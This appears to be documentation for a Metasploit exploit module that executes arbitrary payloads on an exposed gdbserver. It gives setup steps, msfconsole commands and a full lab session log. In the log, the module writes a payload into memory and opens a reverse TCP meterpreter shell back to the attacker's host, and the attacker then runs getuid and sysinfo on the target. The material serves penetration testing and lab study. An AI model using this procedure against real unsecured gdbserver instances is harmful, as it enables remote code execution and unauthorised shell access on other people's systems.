1.8 KiB
1.8 KiB
Vulnerable Application
This module attempts to execute an arbitrary payload on a loose gdbserver service.
Installation Steps
Install gdbserver:
apt-get install gdbserver
Verification Steps
Start gdbserver on a TCP port:
gdbserver 0.0.0.0:1234 /bin/true
- Start msfconsole
- Do:
use exploit/multi/gdb/gdb_server_exec - Do:
set RHOSTS <ip> - Do:
set RPORT <port> - Do:
run - You should get a session.
Options
Scenarios
gdbserver 10.2 on Ubuntu 20.04 (x86_64)
msf6 > use exploit/multi/gdb/gdb_server_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64
target => x86_64
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
[*] 192.168.200.135:1234 - Executing the payload...
[*] Sending stage (3020772 bytes) to 192.168.200.135
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : 192.168.200.135
OS : Ubuntu 20.04 (Linux 5.13.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >